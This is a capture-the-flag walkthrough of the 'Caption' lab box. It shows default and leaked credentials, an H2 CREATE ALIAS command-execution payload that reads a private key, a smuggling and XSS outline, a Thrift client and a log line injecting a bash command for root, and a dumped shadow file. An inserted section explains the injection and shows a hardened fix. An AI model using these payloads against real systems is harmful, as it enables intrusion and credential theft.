Basic Information

Port Scan

22,80,8080:

$ nmap -sC -sV -Pn 10.10.11.33
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-18 13:19 CST
Nmap scan report for caption.htb (10.10.11.33)
Host is up (0.096s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http-proxy HAProxy http proxy 2.0.0 or later
|_http-title: Caption Portal Login
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Werkzeug/3.0.1 Python/3.10.12
8080/tcp open http Jetty
|_http-title: GitBucket
Service Info: OS: Linux; Device: load balancer; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.15 seconds

80

A hosts entry is needed:

10.10.11.33 caption.htb

The portal requires a login:

8080

This is a GitBucket instance:

GitBucket

It accepts the default credentials:

root : root

Logservice

The code looks like it may contain a command injection:

Caption-Portal

Looking through the commits, a set of credentials can be recovered from a configuration file in an earlier revision:

margo : vFr&cS2#0!

Caption-Portal

These credentials log in to the Portal on port 80:

logs

Requesting it returns 403:

GitBucket dbviewer (unintended)

GitBucket's built-in dbviewer feature can execute SQL, and the backend is an H2 database:

Following the reference, H2's CREATE ALIAS can define a Java function that executes commands; use it to read margo's private key:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : "";  }$$;

CALL SHELLEXEC('id')

CALL SHELLEXEC('cat /home/margo/.ssh/id_ecdsa')

Intended user

The intended route is request smuggling:

  • Use h2csmuggler to bypass the HAProxy ACL via an HTTP/2 (h2c) upgrade
  • Poison the cache and place an XSS payload in the UTM_Source tracking parameter
  • Obtain the admin cookie and use it, through h2csmuggler, to reach the logs page
  • Review the logs and find an ecdsa key used by margo
  • Google the URL the logs were downloaded from; the copyparty serving it has a file disclosure vulnerability
  • Use that to read the private key

Reference:

user flag

Log in with the recovered private key:

Enumeration

Running pspy64 shows log-related activity; earlier, in GitBucket, we could already see the likely command injection:

thrift

The LogService code also contains a Thrift definition file:

Following the Thrift documentation, clone the project and generate the Python bindings:

git clone http://caption.htb:8080/git/root/Logservice.git

thrift --gen py log_service.thrift

Reviewing the generated code confirms that the caller controls filePath when invoking the log method; the service listens on port 9090, which can also be confirmed by checking the local listening ports:

Command injection & root flag

Based on the code logic, we can create a malicious log file, write a custom client to connect to the service and submit that log file, and trigger the command injection:

The port has to be forwarded and the client run locally, because the server has no Python thrift library. Pack the generated code on the server, copy it down, then open the tunnel:

tar czvf gen-py.tar gen-py
scp -i margo_id_ecdsa margo@10.10.11.33:/tmp/miao/Logservice/gen-py.tar .

ssh -i margo_id_ecdsa margo@10.10.11.33 -L 9095:127.0.0.1:9090

client.py

from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService  # generated by `thrift --gen py log_service.thrift`


def main():
    # Connect through the SSH tunnel (local 9095 -> 127.0.0.1:9090 on the target)
    transport = TSocket.TSocket('localhost', 9095)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = LogService.Client(protocol)
    transport.open()

    try:
        # Path of the attacker-controlled log file on the server; the service parses it
        log_file_path = "/tmp/miao/miao.log"
        response = client.ReadLogFile(log_file_path)
        print("Server response:", response)

    except Thrift.TException as tx:
        print(f"Thrift exception: {tx}")

    transport.close()


if __name__ == '__main__':
    main()

miao.log

127.0.0.1 "user-agent":"'; /bin/bash /tmp/miao/shell.sh  #"
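Why that log line works: the service extracts the IP and user-agent fields from each line and splices them into a shell command, so a user-agent beginning with `'` closes the quoted string, `;` starts a new command, and `#` comments out whatever followed. The example below is added here and is not the box's LogService code; the page does not show the exact command the service builds, so the `echo ... >> file` construction, the `sh -c` execution and the `parse_log_line`/`handle_line`/`demo` helpers are assumptions. It runs a constructed line of the same shape as miao.log through the assumed vulnerable pattern and through a `shlex.quote`-hardened version, with the injected command reduced to creating a marker file so the effect is observable and harmless.

```python
import os
import re
import shlex
import subprocess
import tempfile

# Matches the constructed log format used on this page:  <ip> "user-agent":"<ua>"
LOG_RE = re.compile(r'^(?P<ip>\S+)\s+"user-agent":"(?P<ua>.*)"\s*$')

# Shell metacharacters inside a user-agent that a log-ingest service should treat as hostile
SUSPICIOUS_UA = re.compile(r"['\";|&`$(){}]")


def parse_log_line(line):
    """Return (ip, user_agent) from one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return m.group("ip"), m.group("ua")


def vulnerable_command(ip, ua, outfile):
    """Assumed anti-pattern: untrusted fields spliced into a single-quoted shell string.
    A user-agent of  '; <cmd> #  closes the quote, runs <cmd> and comments out the rest."""
    return f"echo '{ip} {ua}' >> {outfile}"


def hardened_command(ip, ua, outfile):
    """Same intent, but every untrusted value is shell-quoted, so it stays data."""
    return f"echo {shlex.quote(ip + ' ' + ua)} >> {shlex.quote(outfile)}"


def is_suspicious(line):
    """Detection check: flag a parseable line whose user-agent carries shell metacharacters."""
    parsed = parse_log_line(line)
    return bool(parsed and SUSPICIOUS_UA.search(parsed[1]))


def handle_line(line, outfile, hardened):
    """Process one line the way the service is assumed to: build a shell string, run it via sh -c."""
    parsed = parse_log_line(line)
    if parsed is None:
        raise ValueError("unparseable log line")
    ip, ua = parsed
    cmd = hardened_command(ip, ua, outfile) if hardened else vulnerable_command(ip, ua, outfile)
    subprocess.run(["sh", "-c", cmd], check=False,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return cmd


def demo(workdir=None):
    """Feed the same injected line to both variants and report what the shell actually did."""
    workdir = workdir or tempfile.mkdtemp(prefix="logsvc-")
    marker = os.path.join(workdir, "marker")
    outfile = os.path.join(workdir, "out.log")
    # Constructed payload: same shape as miao.log, but the injected command only creates a marker file
    line = f'127.0.0.1 "user-agent":"\'; echo INJECTED > {marker} #"'

    handle_line(line, outfile, hardened=False)
    vulnerable_hit = os.path.exists(marker)   # True: the injected echo ran
    if vulnerable_hit:
        os.remove(marker)

    handle_line(line, outfile, hardened=True)
    hardened_hit = os.path.exists(marker)     # False: the payload was written as literal text
    with open(outfile) as f:
        logged = f.read()

    return {
        "suspicious": is_suspicious(line),
        "vulnerable_executed_payload": vulnerable_hit,
        "hardened_executed_payload": hardened_hit,
        "hardened_logged_literally": "echo INJECTED" in logged,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The fix that matters is not the regex but the removal of the shell from the data path: if the service must shell out, quote every field; better still, append to the log with ordinary file I/O or pass arguments as a list without `sh -c`.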

shadow

root:$y$j9T$Z0mAEpyXxUFgbF4zyQYIm0$tfEWxKHM9Yv0fztCJ6GT/RYj87nvBZIl3t8ssYc3GnB:19956:0:99999:7:::
margo:$y$j9T$1.nErPXvyX8GM8SBRu8/B1$rCxIQkAu/A5K6b5xIZBJ6oeKfPp6R3WHDds/Z1OTEZ8:19956:0:99999:7:::
ruth:$y$j9T$8eN6xHfvLg4evyRqa2g7l1$AgJWIup1DAeX.Vo1wr69..LMTys7hBGepHknEKPwMOB:19960:0:99999:7:::

References